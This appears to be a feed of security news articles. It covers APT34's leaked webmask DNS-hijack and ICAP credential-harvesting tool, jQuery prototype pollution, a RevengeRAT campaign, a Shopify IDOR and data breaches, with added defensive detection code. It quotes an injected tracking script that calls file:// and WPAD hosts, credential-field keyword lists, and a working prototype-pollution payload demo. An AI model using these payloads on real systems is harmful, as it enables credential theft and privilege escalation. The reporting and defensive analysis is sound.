On April 19 2019 researchers at Chronicle, a security company owned by Google’s parent company, Alphabet, examined the leaked tools, dumped the previous week on a Telegram channel, and confirmed that they are indeed the same ones used by the OilRig attackers. OilRig has been connected to a number of intrusions at companies and government agencies across the Middle East and Asia, including technology firms, telecom companies, and even gaming companies. Whoever is leaking the toolset has also been dumping information about the victims OilRig has targeted, as well as data identifying some of the servers the group uses in its attacks.

According to Duo, OilRig has delivered Trojans that use DNS tunneling for command and control in attacks since at least May 2016. “Since May 2016, the threat group has introduced new tools using different tunneling protocols to their tool set,” Robert Falcone of Palo Alto Networks’ Unit 42 research team wrote in an analysis of the group’s activities.

“Regardless of the tool, all of the DNS tunneling protocols use DNS queries to resolve specially crafted subdomains to transmit data to the C2 and the answers to these queries to receive data from the C2.”

Leaked Source code

The initial leaked source code has three main folders: webmask, poisonfrog and Webshells_and_Panel. While webmask and poisonfrog seem to be single projects, the Webshells_and_Panel folder looks like it wraps more projects into a single bucket. But, for today, let’s focus on webmask.

WEBMask Focus

The webmask project, in my personal opinion, is an APT34 hallmark, since it implements their DNS attack core. APT34 is well known to make wide use of DNS hijacking in order to redirect victims to attacker websites. So let’s see what they have implemented so far in this direction.

The webmask project comes with both a guide (guide.txt) and an installation script (install.sh). From the latter we can see the installed NodeJS version, which happens to be 6.X. This version was first released on 2016-04-26 and is still on the development track today under the name “Boron”. According to the NodeJS version history, the project could not be dated before April 2016, since Nodejs_6.x did not exist before that date. The guide.txt file suggests two solutions (this is the term used); both of them base their ‘core engine’ on a purpose-built DNS server, used as an authoritative name server to respond with crafted ‘A’ records to specific requests. The attackers suggest using solution2 (they write “use this” directly in the configuration file), the one that implements the DNS server in NodeJS. Solution1, on the other hand, uses Python as the DNS server. The following image shows the suggested solution.

APT34: WebMask Project Suggested Solution

Some domain names and IPs are used as configuration examples. Personally I always find it interesting to look at the examples suggested by the attacker, since they carry a marked flavour of the author. In this case the attacker used some target artefacts (IP and DNS) belonging to the ‘Arab Emirates’ net space, while she used as the responsive artefact (the one used to attack) an IP address belonging to a NovinVPS service.

The guide goes on to describe the setup of an ICAP proxy server, used to proxy the victims to the real destination while trapping the entire connection. The attacker suggests Squid3 and guides the operator through installing and configuring it. She uses as ICAP handler a simple Python script placed at icap/icap.py. This script was developed to log and to modify the ICAP/connection flow coming from the squid3 proxy. Then the well-known Haproxy is used as a High Availability service to assure connections, and finally certbot (Let’s Encrypt) is used to give squid3 a valid certificate (but it is neither a mandatory nor a suggested step).

DNS Server scripts

Three files are placed in the dns-redir folder. A configuration file called config.json is used by dnsd.py. The Python script implements a class named MyUDPHandler which is given to the native SocketServer.UDPServer and used as the UDP handler. The script overrides only DNS A records, and only if the name is included in the overrides object (a variable at the beginning of the source code). In other words, if the DNS request is for an A record and the requested name belongs to a specific domain, the script responds with the attacker’s IP address. The following image shows the main three steps of the override chain.


DNSD.py: Three steps DNS overriding chain

According to guide.txt the suggested solution is not dnsd.py: the attacker prefers the dnsd.js script. This script appears not to be externally configurable (it does not import config.json), so to configure it you need to edit the script source code manually. The source is written in a classic style of ECMAScript, without any of the fancy new operators/features introduced in ECMAScript6 and ECMAScript7. dnsd.js performs the same tasks as dnsd.py without any specific change.

ICAP script

In the icap folder a Python script called icap.py is placed. This script handles ICAP flows coming from squid3, extracts the desired information and injects tracking pixels. The Python script implements a ThreadingSimpleServer as an implementation of SocketServer.ThreadingMixIn, which is a native framework for multi-threaded network servers. SocketServer.ThreadingMixIn needs a local address and local port to be spawned, and a BaseICAPRequestHandler class as second parameter in order to handle ICAP flows. The attacker specialised that class in the general ICAPHandler. The aim of the script is to log the following information into separate files: credentials, cookies, injected files and headers. It silently injects a tracking pixel into communications by adding the following JavaScript to the HTML body.

script = ';$(document).ready(function(){$(\'<img src="file://[ip]/resource/logo.jpg"><img src="http://WPAD/avatar.jpg">\');});'

If the parsed request is an HTTP POST, the ICAPHandler tries to extract credentials through a special function called extract_login_password. The following image shows the process flow of the credential extraction.

ICAP.py: Credential Extraction Process

It would be interesting, at least from my point of view, to check the patterns used for login detection. For example the parsing function looks for the following “form names”:

logins = ['login', 'log-in', 'log_in', 'signin', 'sign-in', 'logon', 'log-on']

It also looks for the following user field names:

userfields = ['log', 'login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name', 'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname', 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']

and finally it also looks for the following password fields names:

passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password','passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena', 'secret']

It is interesting to see specific string patterns such as (but not limited to) form_pw, ahd_password, upassword, senha, contrasena, which are quite indicative of victim scenarios. For example strings such as senha, contrasena, usuario, and so on seem to be related to “Spanish”/“Portuguese” words. So if this is true (and Google Translate agrees with me) it looks like APT34 is proxying some connections that might have those username and password fields, which might refer to “Spanish”/“Portuguese” targets. But this is only a hypothesis.

icap.py is also able to intercept basic authentication headers, cookies and general headers, implementing similar functions able to extract interesting information and eventually to modify it if needed. I won’t describe every single function, but one of the most interesting functions, worth showing here, is inject_RESPMOD, which injects a tracking image into the ICAP flow. The following image shows the attacker’s implementation of the inject_RESPMOD function.

ICAP.py: script injection function

The injected script is added to the HTML body and eventually GZipped and shipped back. In this way the attacker tracks who is landing on the target domain.
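Both halves of the webmask chain described above (the A-record override performed by dnsd.py/dnsd.js, and the tracking markup appended by icap.py) leave traces a defender can test for without touching the attacker’s tooling. The following is an added example, not part of the leaked webmask code or of this analysis: one function compares the A records a resolver returns with the addresses the zone owner expects, and one looks for the two `<img>` tags quoted from the injected script. The domain names, addresses and HTML body are constructed for the example; the injected markup is the one quoted in the text.

```javascript
// Added example (not from the webmask leak or this write-up): two checks
// against the behaviour described in the text.
//  1) Hijacked A records: the override chain only rewrites A answers for the
//     configured names, so compare observed A answers with the expected set.
//  2) Injected tracking pixel: look for the two <img> tags icap.py appends.
// Names, addresses and the sample page are constructed for this example.

// Expected A records as the zone owner knows them (constructed).
const EXPECTED_A = {
  "mail.example.com": ["203.0.113.10"],
  "www.example.com": ["203.0.113.20", "203.0.113.21"],
};

// observed: [{name, type, data}] as returned by a resolver.
// Returns [{name, unexpected: [ip, ...]}] for names answered with addresses
// outside the expected set.
function findHijackedNames(expected, observed) {
  const seen = new Map();
  for (const rr of observed) {
    if (rr.type !== "A") continue; // only A records are rewritten by the override chain
    const name = rr.name.toLowerCase().replace(/\.$/, "");
    if (!seen.has(name)) seen.set(name, new Set());
    seen.get(name).add(rr.data);
  }
  const findings = [];
  for (const [name, ips] of Object.entries(expected)) {
    const got = seen.get(name);
    if (!got) continue; // nothing observed for this name
    const unexpected = [...got].filter((ip) => !ips.includes(ip));
    if (unexpected.length) findings.push({ name, unexpected });
  }
  return findings;
}

// The two <img> tags from the injected script quoted in the text, with the
// "[ip]" placeholder accepted as any host.
const PIXEL_PATTERNS = [
  { id: "file-share-image", re: /<img\s+src="file:\/\/[^"]+\/resource\/logo\.jpg"\s*>/i },
  { id: "wpad-image", re: /<img\s+src="http:\/\/wpad\/avatar\.jpg"\s*>/i },
];

function findInjectedPixels(html) {
  return PIXEL_PATTERNS.filter((p) => p.re.test(html)).map((p) => p.id);
}

// Constructed resolver answers: the mail host has been rewritten, www has not.
const SAMPLE_ANSWERS = [
  { name: "mail.example.com.", type: "A", data: "198.51.100.77" },
  { name: "www.example.com.", type: "A", data: "203.0.113.20" },
  { name: "www.example.com.", type: "MX", data: "10 mail.example.com." },
];

// Constructed page body carrying the injected script from the text.
const SAMPLE_HTML =
  "<html><body><p>Welcome</p>" +
  "<script>;$(document).ready(function(){$('<img src=\"file://198.51.100.77/resource/logo.jpg\"><img src=\"http://WPAD/avatar.jpg\">');});</script>" +
  "</body></html>";

function runChecks() {
  return {
    hijacked: findHijackedNames(EXPECTED_A, SAMPLE_ANSWERS),
    pixels: findInjectedPixels(SAMPLE_HTML),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(runChecks(), null, 2));
}
```

The A-record comparison is only as good as the expected set, so it should be fed from the registrar or zone file rather than from another resolver; the pixel check is a plain signature and should be run on the decompressed body, since the text notes the response is GZipped before being shipped back.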

Interesting points

  • WebMask is >= April 2016 (From Installed Dependencies)
  • APT34 might target ‘Arab Emirate’ (From examples into config files)
  • APT34 might target Spanish/Portuguese (From code into the extract_login_password function )
  • APT34 might use NovinVPS (From examples into config files)
  • APT34 needs credentials for change Authoritative DNS (From guide.txt)

The original post is available at the following URL:

About the Author: Marco Ramilli, founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for the US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.

I do have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been in charge of testing the uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence centers I’ve ever experienced! Now I technically lead Yoroi defending our customers, strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – APT34, DNS attacks)




EmCare reveals patient and employee data were hacked

EmCare disclosed that a number of employees’ email accounts had been hacked, potentially exposing personal information of patients and employees.

US healthcare firm EmCare Inc disclosed that a number of employees’ email accounts had been accessed, potentially exposing personal information of almost 60,000 people, including 31,000 patients.

EmCare is owned by Envision Healthcare, it is a leading provider of physician jobs for emergency medicine, inpatient physician services, radiology management programs and other healthcare services.


It has more than 700 practices at locations ranging from major hospitals and health systems to rural hospitals and ambulatory care centers.

“EmCare, Inc. and its affiliates (EmCare) recently became aware that an unauthorized third party obtained access to a number of EmCare employees’ email accounts. EmCare provides physician services.” reads the incident notice published by the company.

“Patients impacted by this incident may have received medical care from a clinician employed by or engaged with an affiliate of EmCare. These services may have been provided in an Emergency Department or as inpatient services in a hospital.”

The company discovered the intrusion on February 19: hackers had compromised some employees’ email accounts and gained access to some patients’, employees’ and contractors’ personal information.

“On Feb. 19, 2019, EmCare determined that the impacted email accounts contained some patients’, employees’ and contractors’ personal information, including name, date of birth or age, and for some patients, clinical information. In addition, in some instances, Social Security and driver’s license numbers were impacted.” continues the notice.

At the time of publishing, the company pointed out that there is no evidence to suggest that the information has been misused.

The extent of the security incident is still unclear, we have no information about the number of accounts that were accessed by the intruders. The company did not provide technical details about the hack.

In my humble opinion, the fact that employees were keeping patients’ data unprotected in their email accounts is very disturbing.

EmCare will offer identity protection and credit monitoring services for patients and employees whose Social Security or driver’s license numbers were exposed in the incident.

“As a general precautionary measure, individuals should remain vigilant about protecting themselves against potential fraud or identity theft by, among other things, reviewing their account statements and monitoring credit reports closely.” concludes the notice.

“If individuals detect any suspicious activity on an account, they should promptly notify the financial institution or company with which the account is maintained. They should also promptly report any fraudulent activity or any suspected incidents of identity theft to the proper law enforcement authorities, including the police and their state’s attorney general.”

Pierluigi Paganini

(SecurityAffairs – EmCare, data breach)


jQuery JavaScript library flaw opens the doors for attacks on hundreds of millions of websites

The popular jQuery JavaScript library is affected by a rare prototype pollution vulnerability that could allow attackers to modify a JavaScript object’s prototype.

The impact of the issue could be severe considering that the jQuery JavaScript library is currently used on 74 percent of websites online, most sites still use the 1.x and 2.x versions of the library that are affected by the ‘Prototype Pollution’ vulnerability.

This week the library received a security patch for the issue, three years after the last major security flaw was discovered in its code.

JavaScript objects are collections of named properties. Every object inherits from a prototype, which supplies default properties and values whenever the object itself does not define them.

An attacker able to modify a shared prototype such as Object.prototype can crash an application or change its behaviour: code that reads a property it never expected to be set now receives an attacker-controlled value.


Given how widespread JavaScript is, the exploitation of prototype pollution flaws could have serious consequences for web applications.

The vulnerability in the jQuery library (CVE-2019-11358) was discovered by researchers at Snyk that also published a proof of concept code for a prototype pollution attack.

“This security vulnerability referred to and manifests as prototype pollution, enables attackers to overwrite a JavaScript application object prototype.” reads the analysis published by Snyk. “When that happens, properties that are controlled by the attacker can be injected into objects and then either lead to denial of service by triggering JavaScript exceptions, or tamper with the application source code to force the code path that the attacker injects.”

The experts demonstrated that exploiting the flaw attackers can assign themselves admin rights on a web app that uses the jQuery library code.

Fortunately, according to the experts, this prototype pollution issue is not exploitable for mass-attacks because the exploit code must be crafted for each specific target.

Web developers using jQuery JavaScript library for their applications are advised to update their projects to the latest jQuery version, v3.4.0.

“jQuery 3.4.0 includes a fix for some unintended behavior when using jQuery.extend(true, {}, …). If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype. This fix is included in jQuery 3.4.0, but patch diffs exist to patch previous jQuery versions,” reads the blog post published by the jQuery team.
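To make the mechanism concrete, here is an added example that is not jQuery’s code: a minimal recursive deep-merge in the spirit of jQuery.extend(true, target, source) before 3.4.0, beside a hardened form that applies the same `__proto__` guard the patch introduced. The attacker JSON and the isAdmin check are constructed for the example.

```javascript
"use strict";
// Added example (not jQuery's code): a recursive deep-merge with the pre-3.4.0
// hole, and the guarded version. Run with: node pollution.js

// Mirrors the permissive jQuery.isPlainObject: an object whose prototype is
// Object.prototype OR null counts as plain. Object.prototype itself has a null
// prototype, so it passes this test, which is the crux of the bug.
function isPlainObject(v) {
  if (v === null || typeof v !== "object") return false;
  const proto = Object.getPrototypeOf(v);
  return proto === null || proto === Object.prototype;
}

// VULNERABLE: copies every enumerable key of source, including an own key
// literally named "__proto__" (which JSON.parse happily creates).
function deepExtendVulnerable(target, source) {
  for (const key in source) {
    const value = source[key];
    if (isPlainObject(value)) {
      // target["__proto__"] resolves to Object.prototype, isPlainObject accepts
      // it, and the recursion then writes attacker keys onto every object.
      const existing = target[key];
      const clone = isPlainObject(existing) ? existing : {};
      target[key] = deepExtendVulnerable(clone, value);
    } else if (value !== undefined) {
      target[key] = value;
    }
  }
  return target;
}

// HARDENED: the 3.4.0-style guard. Skip "__proto__" and self-references, and
// only walk the source's own properties.
function deepExtendFixed(target, source) {
  for (const key of Object.keys(source)) {
    if (key === "__proto__") continue;
    const value = source[key];
    if (value === target) continue;
    if (isPlainObject(value)) {
      const existing = target[key];
      const clone = isPlainObject(existing) ? existing : {};
      target[key] = deepExtendFixed(clone, value);
    } else if (value !== undefined) {
      target[key] = value;
    }
  }
  return target;
}

// Constructed attacker input: JSON.parse creates an OWN property named
// "__proto__" (it does not change the prototype), and for-in enumerates it.
const ATTACKER_JSON = '{"__proto__": {"isAdmin": true}, "theme": "dark"}';

// A typical check an application might run on an unrelated object.
function isAdmin(user) {
  return user.isAdmin === true;
}

function runVulnerable() {
  const guest = { name: "guest" };   // created before the merge, never touched by it
  deepExtendVulnerable({ theme: "light" }, JSON.parse(ATTACKER_JSON));
  const escalated = isAdmin(guest);  // true: inherited from Object.prototype
  delete Object.prototype.isAdmin;   // clean the realm up again
  return escalated;
}

function runFixed() {
  const guest = { name: "guest" };
  const merged = deepExtendFixed({ theme: "light" }, JSON.parse(ATTACKER_JSON));
  const escalated = isAdmin(guest);  // false: the "__proto__" key was skipped
  delete Object.prototype.isAdmin;   // no-op here, keeps the run hermetic
  return { escalated, merged };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable merge escalates guest:", runVulnerable());
  console.log("fixed merge:", runFixed());
}
```

Note that the payload does not set the prototype of the parsed object: JSON.parse creates an own property literally named "__proto__", and it is the merge’s `target["__proto__"]` lookup that resolves to Object.prototype. Any recursive merge, sanitizer or "defaults" helper that walks untrusted keys the same way has the same hole, which is why the fix is a key check rather than a change to how the prototype is read.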

Pierluigi Paganini

(SecurityAffairs – hacking, jQuery JavaScript library)


The post jQuery JavaScript library flaw opens the doors for attacks on hundreds of millions of websites appeared first on Security Affairs.

Russian Twitter bot activity increased in the wake Mueller report release

Experts at security firm SafeGuard reported that Russian Twitter bot activity rose by 286 percent in the wake of the release of the Mueller Report.

Social media platforms like Twitter are key components of misinformation campaigns carried out by nation-state actors, today we discuss Twitter bot activity after the release of the Mueller report.

Experts at security firm SafeGuard reported that Russian Twitter bot activity rose by 286 percent in the wake of the release of the Mueller Report. The company already tracks over 600,000 known bots and trolls.

The experts also observed a significant increase in the number of unique bots and trolls (+48%) from the previous day, a circumstance that suggests the involvement of an army of dormant Twitter bot accounts previously created.

Thousands of Twitter bot accounts were used by the Russian propaganda machine to influence the sentiment of netizens on the content of the Mueller Report.

Experts observed a spike in the use of hashtags related to the Mueller Report in messages published by Russian-linked bots and trolls. We are in the middle of a complex and coordinated misinformation campaign.

According to George Kamide, Director at SafeGuard Cyber, Twitter bot and troll hashtag use increased 852 percent overall. The experts observed a 5,000 percent increase in usage for the #mueller hashtag.

SafeGuard also published a chart of the top five hashtags used in the disinformation campaign launched just after the publication of the Mueller Report.

SafeGuard Cyber uses 52 risk signatures to classify bad actors into four behavior modes: malicious, suspicious, disinformation, and bot.

Data collected by SafeGuard confirm the intensification of the presence of Russian bots on Twitter.

In November 2018, Twitter announced that it had deleted more than 10,000 bot accounts that were posting messages to influence the U.S. midterm election. In January 2019, the social media platform removed 418 accounts associated with Russian entities.

Pierluigi Paganini

(SecurityAffairs – Twitter, Mueller)

The post Russian Twitter bot activity increased in the wake Mueller report release appeared first on Security Affairs.

Campaign leverages Bit.ly, BlogSpot, and Pastebin to distribute RevengeRAT

Palo Alto Networks Unit 42 researchers uncovered a malicious campaign targeting entities in North America, Europe, Asia, and the Middle East with RevengeRAT.

The campaign was carried out during March; the threat actors, tracked as “Aggah”, used pages hosted on Bit.ly, BlogSpot, and Pastebin as command-and-control (C2) infrastructure to distribute RevengeRAT.

Attackers hit organizations in several industries, including technology, retail, manufacturing, state and local government, hospitality, medical, and other professional services.

“In March 2019, Unit 42 began looking into an attack campaign that appeared to be primarily focused on organizations within a Middle Eastern country.” reads the analysis published by Palo Alto Networks.

“Further analysis revealed that this activity is likely part of a much larger campaign impacting not only that region but also the United States, and throughout Europe and Asia.”

The usage of legitimate services to deliver the malware aims at avoiding detection.

RevengeRAT variants have been used by several groups, such as the Gorgon Group, which hit entities in the UK, Spain, Russia and the US. The RAT’s source code was publicly leaked a few years ago, so the malware is likely part of multiple campaigns run by different threat actors.

RevengeRAT lets operators open remote shells on the infected system, manage files, processes and services, log keystrokes, edit the Windows Registry and the hosts file, dump user passwords, access the webcam, and more.

Researchers analyzed a bait document built to load a malicious macro-enabled document from a remote server via template injection.

“These macros use BlogSpot posts to obtain a script that uses multiple Pastebin pastes to download additional scripts, which ultimately result in the final payload being RevengeRAT configured with a duckdns[.]org domain for C2.” continues the analysis.

“During our research, we found several related delivery documents that followed the same process to ultimately install RevengeRAT hosted on Pastebin, which suggests the actors used these TTPs throughout their attack campaign.”

Once the victim opens the decoy document, it displays a lure image designed to trick them into clicking “Enable Editing” and turning on Microsoft Office macros. A remote OLE document containing the malicious macro is then loaded via template injection.

The OLE file loads an embedded Excel document that downloads a malicious script from a Bit.ly shortened URL. In other attacks the malicious code was downloaded in the same way from a Blogspot domain hosting malicious JavaScript.
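Template injection of this kind leaves a footprint in the document package itself: Word records the attached template as a relationship in word/_rels/settings.xml.rels, and a remote one carries an http(s) or UNC Target with TargetMode="External". The following added example (not Unit 42’s code) parses two constructed relationship files and flags templates that point off the machine. In practice the XML would be read out of the unzipped .docx first; the IP address is a documentation-range placeholder, not an indicator from this campaign.

```javascript
"use strict";
// Added example (not Unit 42's code): find a remote attachedTemplate in the
// relationships part Word stores at word/_rels/settings.xml.rels. Both XML
// samples below are constructed for the example.

const MALICIOUS_RELS = `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
    Target="http://198.51.100.23/template.dotm" TargetMode="External"/>
</Relationships>`;

// A locally attached template, as Word writes for a normal document.
const BENIGN_RELS = `<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
    Target="file:///C:\\Users\\me\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm"
    TargetMode="External"/>
</Relationships>`;

const ATTACHED_TEMPLATE =
  "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate";

// Small parser for the flat <Relationship .../> elements; the rels part has
// no nesting, so a regex over the element and its attributes is sufficient.
function parseRelationships(xml) {
  const rels = [];
  const elem = /<Relationship\b([^>]*?)\/?>/g;
  const attr = /([\w:]+)="([^"]*)"/g;
  let m;
  while ((m = elem.exec(xml)) !== null) {
    const rel = {};
    let a;
    while ((a = attr.exec(m[1])) !== null) rel[a[1]] = a[2];
    rels.push(rel);
  }
  return rels;
}

// Where does a Target point? Only a drive-letter path on the local machine, or
// a relative part name inside the package, is considered local.
function classifyTarget(target) {
  let t = target.trim();
  if (/^\\\\/.test(t)) return "remote";               // UNC: \\host\share\x.dotm
  if (/^(https?|ftp):\/\//i.test(t)) return "remote";
  if (/^file:/i.test(t)) {
    t = t.slice(5).replace(/^\/+/, "");
    if (/^[A-Za-z]:/.test(t)) return "local";        // file:///C:\Users\...
    return "remote";                                 // file://host/share/... or UNC
  }
  return "relative";                                 // e.g. styles.xml
}

// Returns the external template targets an analyst should look at.
function findRemoteTemplates(relsXml) {
  return parseRelationships(relsXml)
    .filter((r) => r.Type === ATTACHED_TEMPLATE)
    .filter((r) => classifyTarget(r.Target || "") === "remote")
    .map((r) => r.Target);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("malicious:", findRemoteTemplates(MALICIOUS_RELS));
  console.log("benign:", findRemoteTemplates(BENIGN_RELS));
}
```

The same check is worth running on the other relationship parts (document.xml.rels, the embedded xlsx’s own rels), since the chain described above uses an embedded Excel object as its next hop; anything with TargetMode="External" that leaves the local drive deserves a look.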

“The malicious script carries out several activities on the compromised system. First, it attempts to hamper Microsoft Defender by removing its signature set. The script also kills the Defender process along with the processes for several Office applications.” reads the analysis.

Experts pointed out that the technique of enabling macros and disabling Protected View in Office, and the tactic of killing Windows Defender and Microsoft Office processes, were employed by the Gorgon group in past campaigns.

Once downloaded on a victim’s machine, the script performs the following main actions:

• Downloading a payload from a Pastebin URL
• Creating a scheduled task to periodically obtain and run a script from a Pastebin URL
• Creating an autorun registry key to obtain and run a script from a Pastebin URL

The last-stage malware, downloaded from Pastebin, is a RevengeRAT variant dubbed “Nuclear Explosion” that uses the lulla.duckdns[.]org domain as C2.

Statistics for a single Bit.ly shortened URL showed it had been clicked over 1,900 times from roughly 20 countries, which gives an idea of the extent of the campaign.

The analysis of decoy document’s properties allowed the experts to discover a number of other RevengeRAT samples used in this campaign.

Despite these overlaps, the Palo Alto Networks researchers conclude that there is no “concrete evidence that this attack campaign is associated with Gorgon.”

Pierluigi Paganini

(SecurityAffairs – hacking, RevengeRAT)


The post Campaign leverages Bit.ly, BlogSpot, and Pastebin to distribute RevengeRAT appeared first on Security Affairs.

A flaw in the Shopify API exposed revenue and traffic data of thousands of stores

A researcher discovered a high-severity flaw in the Shopify e-commerce platform that could have been abused to expose the traffic and revenue data of its stores.

Bug bounty hunter Ayoub Fathi discovered a vulnerability in a Shopify API endpoint that could be exploited to leak the revenue and traffic data of thousands of stores.

The Shopify platform is currently used by 800,000 different online merchants in more than 175 countries.


The white hat hacker analyzed the APIs published over the past year by Shopify that allow users to fetch sales data for graph presentations. He noticed that the system was leaking the revenue data of two unnamed Shopify stores, one of which had been removed from the platform.

Fathi then decided to perform a mass check on all existing stores, iterating over the $storeName parameter to determine whether the endpoint was affected by an Insecure Direct Object Reference (IDOR) issue and whether any customer information would leak through the API.

“The first idea that came to mind is to perform a mass check on eventually all existing stores, and see if we would get any customer data out of any.” reads a post published by the researcher.

“The attack process will be as follows:

  • Building a wordlist of store names (from storeName.myshopify.com);
  • Iterate the wordlist against the almost vulnerable endpoint:
/shops/$storeName/revenue_data.json
  • Filtering out the vulnerable domains;
  • Analyzing affected stores to figure out the root cause of the observed behaviour or eventual vulnerability.”

Fathi found that 4 out of 1,000 stores (one of which was closed) were vulnerable. He then ran a further test on a larger dataset, containing 813,684 records, built from Forward DNS (FDNS) data.

“Using this approach, we don’t need to generate store names from a given domain list. Instead, we will be using the FDNS to obtain reverse CNAME records of shops.myshopify.com (which all the stores point to) ” continues the expert. “Now, we will be looking for CNAME records that match shops.myshopify.com where Shopify merchants are hosting their stores.”

The hacker wrote an exploit.py script to run against the new wordlist of 813K store names.

Using this approach, the expert retrieved a list of vulnerable stores and queried them to obtain each store’s monthly revenue data in USD over its lifetime.

“This was tested on 800K merchant stores, +12,100 of them were exposed, +8700 were vulnerable stores that we were able to obtain their sales and traffic data and they should not be public, and 3400 are expected to have their sales data public” wrote Fathi “to summarize:

  • This was tested on +800K stores
  • +12,100 were exposed
  • +8700 stores were vulnerable and their data is set to private.
  • Only +3400 stores data was expected to be public.”

The researcher determined that the leak was caused by the Shopify Exchange App.

“Based on above data and a few more days of research, I came to the conclusion that this was caused by Shopify Exchange App (Actively used by merchants now) which was introduced only a few months before this vulnerability. Any merchant who has Exchange App installed would be vulnerable.” states Fathi.
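What a bug of this class looks like in code, as an added hypothetical model rather than Shopify’s implementation: the write-up only tells us that stores with the Exchange app installed answered the revenue endpoint regardless of whether the merchant had made sales data public, so the vulnerable handler below gates on that feature flag, while the fixed one performs the object-level check (the caller owns the store, or the store opted into publishing). Store records, field names and the wordlist are invented for the example.

```javascript
"use strict";
// Added example, not Shopify's code: a hypothetical model of the object-level
// authorization bug (IDOR) behind an endpoint shaped like
// GET /shops/$storeName/revenue_data.json. All records below are invented.

const STORES = new Map([
  ["acme-goods",  { ownerId: 101, exchangeInstalled: true,  salesPublic: true,
                    revenueUsd: { "2018-09": 12000, "2018-10": 15500 } }],
  ["quiet-shop",  { ownerId: 102, exchangeInstalled: true,  salesPublic: false,
                    revenueUsd: { "2018-09": 800 } }],
  ["no-exchange", { ownerId: 103, exchangeInstalled: false, salesPublic: false,
                    revenueUsd: { "2018-09": 430 } }],
]);

// VULNERABLE: authorization is inferred from a feature flag on the object,
// not from who is asking or from what the merchant chose to publish.
// "requester" is accepted but never consulted, which is the whole bug.
function revenueHandlerVulnerable(storeName, requester) {
  const store = STORES.get(storeName);
  if (!store) return { status: 404 };
  if (!store.exchangeInstalled) return { status: 403 };
  return { status: 200, body: store.revenueUsd };
}

// FIXED: object-level check. The caller must own this store, or the store
// must have opted into publishing its sales data; 404 and 403 stay distinct
// so legitimate owners still get a useful error.
function revenueHandlerFixed(storeName, requester) {
  const store = STORES.get(storeName);
  if (!store) return { status: 404 };
  const isOwner = requester !== null && requester.id === store.ownerId;
  if (!isOwner && !store.salesPublic) return { status: 403 };
  return { status: 200, body: store.revenueUsd };
}

// The enumeration the researcher describes: iterate a wordlist of store
// names as an anonymous caller and keep the ones that answer 200.
function enumerateLeaks(handler, wordlist) {
  return wordlist.filter((name) => handler(name, null).status === 200);
}

const WORDLIST = ["acme-goods", "quiet-shop", "no-exchange", "does-not-exist"];

if (typeof require !== "undefined" && require.main === module) {
  console.log("leaks before fix:", enumerateLeaks(revenueHandlerVulnerable, WORDLIST));
  console.log("leaks after fix: ", enumerateLeaks(revenueHandlerFixed, WORDLIST));
}
```

The distinction the enumeration draws is the one the researcher reports: a store that is listed for sale on Exchange and has chosen to publish its figures is expected to answer, while a private store must not, whoever is asking and whatever apps it has installed.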

Fathi reported the flaw to Shopify on 13 October 2018; the company acknowledged it on October 16 and fixed it on November 1.

The bad news is that Shopify did not award the expert a bounty, citing policy violations because he tested shops that were not created for testing purposes.

Below an excerpt of the email Shopify sent to the expert:

“While we appreciate you were trying to demonstrate the impact of the identified issue, intentionally accessing information of other merchants and not immediately reporting this to us is of significant concern to Shopify. As a result, this report will not be awarded a bug bounty.”

Pierluigi Paganini

(SecurityAffairs – hacking, Shopify)

The post A flaw in the Shopify API exposed revenue and traffic data of thousands of stores appeared first on Security Affairs.

Ride-Hailing Company operating in Iran exposes data of Iranian Drivers

A security researcher discovered a database belonging to a ride-hailing company operating in Iran that was left exposed online containing over 6.7M records.

Security researcher Bob Diachenko discovered a database belonging to a ride-hailing company operating in Iran that was left exposed online without protection.

The MongoDB instance, named ‘doroshke-invoice-production’, contained over 6.7 million records of Iranian drivers.

Exposed records include driver first and last name, SSN (the 10-digit Iranian national ID number, in plain text), phone number, and invoice date.

The expert discovered the database using BinaryEdge, a search engine that scans the entire Internet address space and indexes the exposed services it finds.

“On April 18th, during our regular security audit of nonSql databases with BinaryEdge search engine, I have discovered an open and publicly available MongoDB instance which contained astonishingly sensitive information on Iranian drivers.” reads a blog post published by the expert.

The database included two collections with invoices split by year:

  • invoice95 (all the invoices from year 1395, which runs from March 2016 to March 2017 in the Gregorian calendar), with total number of records: 740,952
  • invoice96 (all the invoices from year 1396, which runs from March 2017 to March 2018 in the Gregorian calendar), with total number of records: 6,031,317

The MongoDB instance contained a large number of duplicates; the researcher estimates the number of unique entries is between one and two million.

At the time of writing the owner of the archive is still unknown; fortunately, the instance has since been secured.

Diachenko reported his discovery to the Iranian CERT and also attempted to alert researchers in Iran to help identify the owner.

